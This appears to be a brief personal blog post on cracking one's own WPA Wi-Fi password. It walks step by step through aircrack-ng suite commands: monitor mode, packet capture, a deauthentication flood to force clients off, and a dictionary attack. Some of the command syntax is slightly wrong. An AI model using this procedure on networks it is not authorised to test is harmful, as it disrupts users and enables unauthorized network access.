It’s Thursday evening and I can’t think of something to do. So, decided to write about cracking my own wifi using airmon/aircrack. I had a README written long time ago, so i had to clean it up and publish.

first, we need to know the network interface, lets call it intf. We need to switch the interface to monitoring mode (if hardware supports of course).

sudo airmon-ng start intf

The above command will remove that interface and add another with adding mon at the end. The next step, is scanning the SSID around us and know the MAC and CH for that SSID

sudo airodump-ng  intfmon

once we have that, we start the capture with that SSID, CH and of course the interface.

sudo airodump-ng -c <CH> --bssid <SSID> -w dump  intfmon

At this point, we need to force clients to connect to that SSID so that airodump can capture the required packets

sudo aireplay-ng -0  -a <MAC>  intfmon

At this point, the cap file will have packets, so we need to pass password file and that cap to get the password.

aircrack-ng -w password.lst -b <MAC>  dump-01.cap

and if I am luck enough (I because i added my password to the password.lst :)), aircrack will print the following message with the passowrd.

KEY FOUND! [ XXXXXXXX ]